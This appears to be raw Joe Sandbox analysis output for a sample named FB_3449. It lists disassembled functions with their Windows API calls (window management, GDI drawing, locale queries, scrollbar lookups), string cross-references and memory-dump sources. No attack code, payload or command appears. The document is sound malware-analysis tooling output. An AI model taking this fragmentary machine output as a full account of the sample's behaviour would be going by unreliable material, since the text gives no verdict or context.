IsIconic.USER32(00000000), ref: 00453574

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004535A8
SetActiveWindow.USER32(00000000), ref: 004535AE
ShowWindow.USER32(00000000,00000000), ref: 004535C0

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0043D99C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64

APIs

IsIconic.USER32(?), ref: 0043D9AB
GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
GetWindowRect.USER32(?), ref: 0043D9E1
GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
ScreenToClient.USER32(00000000), ref: 0043DA11
ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Strings

,, xrefs: 0043D9B4

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00456740, Relevance: 9.1, APIs: 6, Instructions: 86

APIs

IsIconic.USER32(?), ref: 00456748
SetActiveWindow.USER32(?), ref: 00456759
IsWindowEnabled.USER32(00000000), ref: 0045677C
DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 004514F0: ShowWindow.USER32(00000000,?), ref: 00451527

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0043D0B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81

APIs

IsIconic.USER32(?), ref: 0043D0F7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D115
GetWindowPlacement.USER32(?,0000002C), ref: 0043D14B
SetWindowPlacement.USER32(?,0000002C), ref: 0043D16F

Strings

,, xrefs: 0043D139

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00456690, Relevance: 7.6, APIs: 5, Instructions: 59

APIs

IsIconic.USER32(00000000), ref: 00456698
SetActiveWindow.USER32(00000000), ref: 004566B0
IsWindowEnabled.USER32(00000000), ref: 004566D3
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0042658C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46

APIs

IsIconic.USER32(?), ref: 004265D5
GetWindowPlacement.USER32(?,?), ref: 004265E3
GetWindowRect.USER32(?,?), ref: 004265EF

Part of subcall function 004264FC: GetSystemMetrics.USER32(00000000), ref: 0042654D
Part of subcall function 004264FC: GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromWindow, xrefs: 004265A3

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 004087A4, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004087BF
FindClose.KERNEL32(00000000,00000000,?), ref: 004087CA
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004087E3
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004087F4

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0043C810, Relevance: 3.1, APIs: 2, Instructions: 63

APIs

IsIconic.USER32(?), ref: 0043C848
GetCapture.USER32(?), ref: 0043C851

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0040AA6C, Relevance: 3.0, APIs: 2, Instructions: 37

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AA92
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AAAB

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00438204, Relevance: 1.6, APIs: 1, Instructions: 130

APIs

Part of subcall function 00457784: PtInRect.USER32(01291390,?,?), ref: 00457803
Part of subcall function 00457784: GetCursorPos.USER32(?), ref: 0045785C

GetKeyboardState.USER32(?), ref: 0043833C

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0040976C, Relevance: 1.5, APIs: 1, Instructions: 29

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 004097B8, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00427C9C, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 98

APIs

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00427CA3
GetProcAddress.KERNEL32(00000000,InitializeFlatSB,comctl32.dll), ref: 00427CB8
GetProcAddress.KERNEL32(00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CC8
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CD8
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CE8
GetProcAddress.KERNEL32(00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CF8
GetProcAddress.KERNEL32(00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D19
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D3A
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB), ref: 00427D5B
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB), ref: 00427D7C
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp), ref: 00427D9D
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp), ref: 00427DBE
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollRange,00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar), ref: 00427DDF

Strings

InitializeFlatSB, xrefs: 00427CB2
FlatSB_GetScrollInfo, xrefs: 00427D55
FlatSB_EnableScrollBar, xrefs: 00427CF2
UninitializeFlatSB, xrefs: 00427CC2
comctl32.dll, xrefs: 00427C9E
FlatSB_GetScrollProp, xrefs: 00427CD2
FlatSB_GetScrollRange, xrefs: 00427D34
FlatSB_SetScrollPos, xrefs: 00427D97
FlatSB_SetScrollProp, xrefs: 00427CE2
FlatSB_SetScrollRange, xrefs: 00427DD9
FlatSB_GetScrollPos, xrefs: 00427D76
FlatSB_SetScrollInfo, xrefs: 00427DB8
FlatSB_ShowScrollBar, xrefs: 00427D13

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041FFE4, Relevance: 37.7, APIs: 25, Instructions: 248

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
SelectObject.GDI32(?,?), ref: 0042003C
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
SelectObject.GDI32(?,?), ref: 004200A5
DeleteObject.GDI32(?), ref: 004200B1
CreateCompatibleDC.GDI32(00000000), ref: 004200C5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
SelectObject.GDI32(?,?), ref: 004200FB
SelectPalette.GDI32(?,090806FA,00000000), ref: 0042010F
SelectPalette.GDI32(?,?,00000000), ref: 00420121
SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
SelectPalette.GDI32(?,090806FA,000000FF), ref: 0042014C
RealizePalette.GDI32(?), ref: 00420158
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
SetTextColor.GDI32(?,00000000), ref: 004201A4
SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
SetTextColor.GDI32(?,?), ref: 0042020D
SetBkColor.GDI32(?,?), ref: 00420217
SelectObject.GDI32(?,00000000), ref: 0042022A
DeleteObject.GDI32(?), ref: 00420233
SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
DeleteDC.GDI32(?), ref: 0042025E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0042398C, Relevance: 31.7, APIs: 21, Instructions: 194

APIs

GetObjectA.GDI32(?,00000054,?), ref: 004239AF
GetDC.USER32(00000000), ref: 004239DD
CreateCompatibleDC.GDI32(?), ref: 004239EE
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00423B87,?,?,00000054,?), ref: 00423A09
SelectObject.GDI32(?,00000000), ref: 00423A23
PatBlt.GDI32(?,00000000,00000000,?,?,00000042,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000), ref: 00423A45
CreateCompatibleDC.GDI32(?), ref: 00423A53
DeleteDC.GDI32(?), ref: 00423B39

Part of subcall function 004232C4: GetObjectA.GDI32(00000000,00000054,?), ref: 00423344
Part of subcall function 004232C4: GetDC.USER32(00000000), ref: 00423355
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000000), ref: 00423366
Part of subcall function 004232C4: CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000,00000000,00423912,?,00000000,00000000), ref: 004233B2
Part of subcall function 004232C4: CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004233D6
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000C), ref: 00423426
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000E), ref: 00423433
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004234DD
Part of subcall function 004232C4: GetDIBColorTable.GDI32(?,00000000,00000100,-00000027), ref: 00423503
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 0042352E
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 0042353B
Part of subcall function 004232C4: CreateDIBSection.GDI32(00000028,00000001,00000000,00000003,00000000,00000000), ref: 00423591
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 004235F2
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 00423633
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 00423673
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 0042367F
Part of subcall function 004232C4: FillRect.USER32(?,?,00000000), ref: 004236D0
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004236E8
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423702
Part of subcall function 004232C4: SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042374A
Part of subcall function 004232C4: PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062,00000000,00423890,?,00000000,004238B2,?,00000000,004238C3,?,?), ref: 0042376C
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000028), ref: 0042377F
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004237A2
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 004237BE
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 004237C9
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004237E7
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423801
Part of subcall function 004232C4: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423829
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,000000FF), ref: 0042383B
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 00423845
Part of subcall function 004232C4: DeleteDC.GDI32(?), ref: 00423860
Part of subcall function 004232C4: SelectPalette.GDI32(?,?,000000FF), ref: 0042388A

SelectObject.GDI32(?), ref: 00423A9B
SelectPalette.GDI32(?,?,00000000), ref: 00423AAE
RealizePalette.GDI32(?), ref: 00423AB7
SelectPalette.GDI32(?,?,00000000), ref: 00423AC3
RealizePalette.GDI32(?), ref: 00423ACC
SetBkColor.GDI32(?), ref: 00423AD6
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423AFA
SetBkColor.GDI32(?,00000000), ref: 00423B04
SelectObject.GDI32(?,00000000), ref: 00423B17
DeleteObject.GDI32 ref: 00423B23
SelectObject.GDI32(?,00000000), ref: 00423B54
DeleteDC.GDI32(00000000), ref: 00423B70
ReleaseDC.USER32(00000000,00000000), ref: 00423B81

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00424708, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351

APIs

GetDC.USER32(00000000), ref: 00424972
CreateCompatibleDC.GDI32(00000001), ref: 004249D7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004249EC
SelectObject.GDI32(?,00000000), ref: 004249F6
DeleteObject.GDI32(00000000), ref: 00424AA9

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

SelectPalette.GDI32(?,?,00000000), ref: 00424A26
RealizePalette.GDI32(?), ref: 00424A32
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00424A56
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00424AAF,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00424A64
SelectPalette.GDI32(?,00000000,000000FF), ref: 00424A96
SelectObject.GDI32(?,?), ref: 00424AA3
CreateDIBSection.GDI32(00000001,?,00000000,00000000,00000000,00000000), ref: 00424AF4
GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,00424B73,?,00000000,?,00000000,00424C25,?,?), ref: 00424B08

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

ReleaseDC.USER32(00000000,00000001), ref: 00424B6D

Strings

(, xrefs: 004248C1
BM, xrefs: 0042482C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00458D4C, Relevance: 23.0, APIs: 15, Instructions: 468

APIs

Part of subcall function 00423928: GetObjectA.GDI32(?,00000004), ref: 00423941
Part of subcall function 00423928: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042396D
Part of subcall function 00423928: CreatePalette.GDI32(?), ref: 00423977

Part of subcall function 0041F4D8: StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0041F542

SetTextColor.GDI32(00000000,00000000), ref: 0045900C
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459017
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045903A
SetTextColor.GDI32(00000000,00000000), ref: 0045908F
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045909A
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 004590BD

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetTextColor.GDI32(00000000,00000000), ref: 0045911A
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459125
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459148

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

SetTextColor.GDI32(00000000,00000000), ref: 00459208
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045921A
BitBlt.GDI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459244
SetTextColor.GDI32(00000000,00000000), ref: 00459260
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459272
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045929C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00423E90, Relevance: 21.2, APIs: 14, Instructions: 217

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

